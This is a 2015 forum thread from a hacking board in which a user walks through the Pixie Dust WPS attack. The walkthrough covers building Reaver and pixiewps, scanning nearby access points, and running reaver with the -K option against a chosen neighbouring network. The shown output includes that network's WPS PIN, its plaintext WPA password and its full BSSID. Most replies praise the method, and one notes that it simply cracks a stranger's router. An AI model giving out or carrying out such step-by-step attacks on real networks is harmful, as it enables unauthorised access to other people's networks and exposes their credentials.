Tutorial WiFi Hacking 2015 - Pixie Dust Explained.

Tutorial WiFi Hacking 2015 - Pixie Dust Explained. - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Network Hacking (https://sinister.ly/Forum-Network-Hacking)
+--- Thread: Tutorial WiFi Hacking 2015 - Pixie Dust Explained. (/Thread-Tutorial-WiFi-Hacking-2015-Pixie-Dust-Explained)

WiFi Hacking 2015 - Pixie Dust Explained. - Conch - 05-03-2015

Hello members.
This is my first tutorial, this was also posted on another forum but it was shut down.
This is fully written by myself.

What is Pixie Dust?

Pixie Dust is a new method for hacking WiFi, it utilizes WPS flaws (Reaver anyone?)
Anyhow, this was discovered back in 2014, however tools to exploit this, have surfaced.

NFO:

Quote:Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some APs (pixie dust attack). It is meant for educational purposes only. All credits for the research go to Dominique Bongard.

Pre-requisites / Tools.
Reaver V1.5.1 [Automated PIN finder and Pre-shared Key output] Reaver Fork V1.5.1 Automation.
WPScan (Scans targets for chipset) WPScan Download.
PixieWPS. Download PixieWPS.
Any Linux Distribution.

What is required?
PKR. (Public Key Registrar.)
PKE. (Public Key Enrollee.)
AuthKey.
E-Hash1.
E-Hash2.
M1 Enrollee Nonce.

However... We don't need any of these, since the Reaver Automation does all the work.
All we need is the -K option.

This exploit works on ALL Ralink chipsets, and some Broadcom [Other chipsets are currently unconfirmed]

This is why we need WPScan, to check what chipsets the APs (Access Points) have.

First of all, check the needed dependencies on Github and compile.

Quote:cd reaver-xxxxxxx/src/
./configure
make
make install

Replace xxxxxxx with the full path to the Reaver mod.

Now cd into WPSPixie.

Quote:cd src
make
make install

make install requires root [sudo]!

Now let's run it!

Quote:python wpscan.py

Get IPv6 errors?
Supress them!
http://tech.xster.net/tips/suppress-scapy-ipv6-warning/

Here is the output from WPScan.py

Quote:BSSID: 84:9C:XX:XX:XX:XX
ESSID: EE-BrightBox-94k225
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
AP Setup Locked : 0x01
Response Type : 0x03
UUID-E : 0x0000000000000144ff00010000340144
Manufacturer : Arcadyan
Model Name : Arcadyan
Model Number : 123456
Serial Number : 12345
Primary Device Type : 0x00060050f2040001
Device Name : EEBB
Config Methods : 0x200c
RF Bands : 0x01
Unknown : 0x00372a000120

BSSID: 40:CB:XX:XX:XX:XX
ESSID: TALKTALK-6F8DF0
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
Response Type : 0x03
UUID-E : 0x6304125310192006122840cba86f8df2
Manufacturer : Realtek Semiconductor Corp.
Model Name : RTL8671
Model Number : EV-2006-07-27
Serial Number : 123456789012347
Primary Device Type : 0x00060050f2040001
Device Name : ADSL Modem/Router
Config Methods : 0x0082

BSSID: C0:3E:XX:XX:XX:XX
ESSID: The-Uncultured
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
Response Type : 0x03
UUID-E : 0x5d04b66a5cc96731cc792a0d06c5a6e5
Manufacturer : Broadcom
Model Name : Broadcom
Model Number : 123456
Serial Number : 1234
Primary Device Type : 0x00060050f2040001
Device Name : BroadcomAP
Config Methods : 0x200c
RF Bands : 0x01
Unknown : 0x00372a000120

BSSID: C0:3E:XX:XX:XX:XX
ESSID: SKY34B29
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
Response Type : 0x03
UUID-E : 0x8b413fdc755492098b7efa523e5704d5
Manufacturer : Broadcom
Model Name : Broadcom
Model Number : 123456
Serial Number : 1234
Primary Device Type : 0x00060050f2040001
Device Name : BroadcomAP
Config Methods : 0x200c
RF Bands : 0x01
Unknown : 0x00372a000120

BSSID: 18:28:XX:XX:XX:XX
ESSID: SKYFB7A2
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
Response Type : 0x03
UUID-E : 0x76c89082d4ee5b10268d1030634cb5fd
Manufacturer : AirTies Wireless Networks
Model Name : SB601
Model Number : 1.0.0.76
Serial Number : AT1581349000812
Primary Device Type : 0x00060050f2040001
Device Name : SB601
Config Methods : 0x0004
RF Bands : 0x01
Unknown : 0x00372a000120
Unknown : 0x007fc510001841079c17e5f6495b85e7c75df07d03423030303030303031

BSSID: E8:CC:XX:XX:XX:XX
ESSID: TALKTALK-0E965E
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
Response Type : 0x03
UUID-E : 0xbc329e001dd811b28601e8cc180e965e
Manufacturer : D-Link Corporation.
Model Name : D-Link Wireless Access Point
Model Number : RT2860
Serial Number : 12345678
Primary Device Type : 0x00060050f2040001
Device Name : D-LinkAP
Config Methods : 0x210c
RF Bands : 0x00
Unknown : 0x00372a000120

BSSID: 7C:4C:XX:XX:XX:XX
ESSID: SKY64FAD
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
Response Type : 0x03
UUID-E : 0x8ea906caba9af72e2e48bed45ee78837
Manufacturer : Broadcom
Model Name : Broadcom
Model Number : 123456
Serial Number : 1234
Primary Device Type : 0x00060050f2040001
Device Name : BroadcomAP
Config Methods : 0x200c
RF Bands : 0x01
Unknown : 0x00372a000120

Sadly we got not Ralink (VERY Vulnerable)
But we did get some Broadcom - Let's choose one.

I'll choose this one: TALKTALK-0E965E

Now let's run it through Reaver.

Quote:reaver -i mon0 -b E8:CC:XX:XX:XX:XX -vv -K 1

Quote:[?] Restore previous session for E8:CC:XX:XX:XX:XX? [n/Y] n
[+] Waiting for beacon from E8:CC:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Associated with E8:CC:XX:XX:XX:XX (ESSID: TALKTALK-0E965E)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c9:2f:61:b1:60:95:58:2c:a1:81:25:46:14:cb:ff:d6
[P] PKE: 13:06:df:33:fc:17:6e:f4:5c:c0:25:c6:9a:10:b1:43:bc:3b:6c:de:cb:f3:fb:17:a2:21:c0:00:ef:09:6f:9c:e9:f0:bd:4f:ba:6c:95:bc:b7:7d:c0:16:22:51:00:c6:84:63:af:93:1c:19:75:05:4a:ad:00:f4:91:3a:60:96:3c:34:dd:95:d5:ac:6f:07:f6:58:8a:e8:04:f9:6b:fb:9e:d2:c5:7d:d8:9c:9f:ff:f7:97:75:b3:37:47:b6:2d:e3:ef:97:9f:07:6a:a7:09:12:0c:3d:7a:47:73:f5:9c:a2:cc:12:fb:a5:a4:51:f2:42:1f:2b:27:d0:0d:15:76:ec:4e:09:56:cc:17:ed:96:1b:e7:8c:44:50:63:3b:9d:45:db:aa:4a:07:05:02:b2:5c:3a:65:de:5b:40:9f:42:34:ec:94:1e:32:c2:5c:07:b8:bc:13:0f:27:52:f7:7e:37:63:97:eb:7c:ce:d8:57:76:ba:1a:35:84:b9:b1:e3
[P] WPS Manufacturer: D-Link Corporation.
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] PKR: f0:14:fd:8a:bd:d6:5a:4e:17:b5:97:c8:8b:30:7f:34:d0:44:76:97:7c:56:d5:15:db:6c:e6:a5:f3:ae:1d:58:78:cf:e6:20:b8:ed:69:27:8b:94:e8:33:8f:c7:3b:c4:66:e8:b2:63:a5:5f:af:83:9e:a7:03:57:4d:39:d5:01:b2:19:38:91:e8:44:6a:c5:b5:a7:98:16:ea:07:ec:e2:87:5e:4f:9c:3c:68:b7:9e:c8:ea:b7:c7:d3:da:95:85:6f:de:43:3f:51:e4:0a:05:df:0a:fa:83:70:6e:aa:e8:18:69:ac:6f:ca:2b:f8:9d:36:f0:a8:de:65:85:e3:1d:8c:a8:99:11:20:c3:bc:c9:88:a5:2d:37:a5:5c:0c:8a:1d:24:d9:61:19:43:d5:75:0f:1d:07:83:b5:0a:b2:74:ca:c1:f1:03:a2:9c:b6:ff:10:22:0a:2f:d7:4b:71:85:88:66:22:b4:48:0a:27:0f:ec:62:3a:84:56:78:c9:97
[P] AuthKey: ab:3a:38:46:a3:98:e2:cc:34:58:cb:63:ae:0e:3c:f6:e8:e9:16:52:b0:0f:1e:ed:e1:84:37:8d:38:78:67:0a
[+] Sending M2 message
[P] E-Hash1: 46:5e:9f:a8:0e:da:af:32:83:0d:e4:3d:a8:ef:a2:32:9b:52:fd:50:e4:96:3e:d5:7c:f3:cf:c3:2d:36:94:72
[P] E-Hash2: 5f:a0:b2:45:19:69:e1:90:25:18:d4:4c:a5:8f:82:f9:b5:ba:34:e2:80:e5:38:05:a9:2e:39:cc:be:d6:de:e2
[Pixie-Dust]
[Pixie-Dust] [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] PSK1: 30:28:1d:c5:3e:ca:24:42:3e:f8:db:b3:10:6c:a5:1e
[Pixie-Dust] [*] PSK2: ae:f4:c9:22:80:d4:cc:a0:79:25:9d:dc:0b:bf:dc:50
[Pixie-Dust] [+] WPS pin: 09559981
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s
[Pixie-Dust]
Running reaver with the correct pin, wait ...
Cmd : reaver -i mon0 -b E8:CC:XX:XX:XX:XX-c 11 -s y -p 09559981

[Reaver Test] BSSID: E8:CC:18:0E:96:5E
[Reaver Test] Channel: 11
[Reaver Test] [+] WPS PIN: '09559981'
[Reaver Test] [+] WPA PSK: 'JFQCGD4C'
[Reaver Test] [+] AP SSID: 'TALKTALK-0E965E'

And there we have it! A WiFi password in less than 5 seconds!
I hope you enjoyed this tutorial!

Warm Regards,
Conch.

RE: WiFi Hacking 2015 - Pixie Dust Explained. - general_lee - 05-15-2015

Oh thank you! This is so much faster than just reaver!

RE: WiFi Hacking 2015 - Pixie Dust Explained. - rod - 08-21-2015

Interesting read, thanks for sharing

RE: WiFi Hacking 2015 - Pixie Dust Explained. - mothered - 08-23-2015

The thread Is over 3 months old, but nonetheless, some very Interesting reading.

Well documented, referenced and elaborated.

RE: WiFi Hacking 2015 - Pixie Dust Explained. - Exkr - 08-23-2015

Nice tutorial. Will bookmark and give it a try when I'm on my home network.

RE: WiFi Hacking 2015 - Pixie Dust Explained. - trickguru - 12-03-2015

Nice tutorial, well explained. Thank you Very much

RE: WiFi Hacking 2015 - Pixie Dust Explained. - meow - 12-03-2015

This isn't an exploit so much as it is a bruteforce tool. Also, I don't see any actual explanation here... this thread is just you showing us that you're able to use some tools to get some random joe's router password without any elaboration on what's actually going on.